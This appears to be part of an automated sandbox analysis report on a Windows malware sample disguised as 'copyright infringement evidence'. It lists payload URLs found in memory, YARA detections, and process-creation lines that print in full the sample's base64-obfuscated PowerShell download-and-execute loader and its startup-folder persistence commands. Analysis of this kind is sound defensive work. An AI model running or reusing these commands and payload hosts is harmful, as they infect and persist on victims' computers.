Source: wscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/9
Source: wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/Ne
Source: wscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.00000254699A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/0Hqnx
Source: wscript.exe, 0000000A.00000003.2753742233.00000245916EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756039132.00000245916F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C49BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C49BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/0HqnxP
Source: wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/0Hqnxte
Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/0Hqnxza
Source: wscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/6fcuV
Source: wscript.exe, 00000008.00000002.2758183805.000001C4CE20F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749612240.000001C4CE20C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2745856502.000001C4CE20C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749879678.000001C4CE20E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/6fcuVP
Source: wscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/6fcuVee/d
Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee:443/d/0Hqnxku
Source: wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee:443/d/0Hqnxky
Source: wscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee:443/d/0Hqnxu
Source: wscript.exe, 00000008.00000003.2751834805.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749778775.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757726082.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee:443/d/6fcuV
Source: powershell.exe, 00000024.00000002.2530533193.000001EF69EA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF6A015000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.gith
Source: powershell.exe, 00000023.00000002.2350744372.000002080FEE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.co
Source: powershell.exe, 00000023.00000002.2350744372.000002081137E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.00000208112E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF532A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF53306000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt
Source: powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txtKks;
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763562068.00000139D8A1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.ru/bee/config.json
Source: copyright_infringement_evidence_1.exe, 00000000.00000002.2763562068.00000139D8A1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rdoge.ru/bee/config.jsonf
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8824, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: copyright_infringement_evidence_1.exe
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
